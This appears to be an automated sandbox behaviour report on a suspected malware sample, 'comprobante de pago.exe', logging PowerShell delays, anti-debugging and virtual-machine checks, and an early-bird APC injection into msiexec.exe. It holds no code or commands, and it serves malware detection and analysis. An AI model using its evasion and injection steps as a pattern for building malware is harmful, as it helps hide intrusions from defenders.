Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5964			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3681			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6616	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004064C1 FindFirstFileW,FindClose,	0_2_004064C1
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596F
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1502481659.000000000596F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\Dr
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1502481659.000000000596F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\Dr
Source: powershell.exe, 00000002.00000002.1502481659.000000000596F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\Dr
Source: svchost.exe, 00000005.00000002.2075283305.000001D70922B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2076503371.000001D70EA5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1987612462.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.1987612462.0000000007767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\comprobante de pago.exe	API call chain: ExitProcess graph end node			graph_0-3229
Source: C:\Users\user\Desktop\comprobante de pago.exe	API call chain: ExitProcess graph end node			graph_0-3407

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3000000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
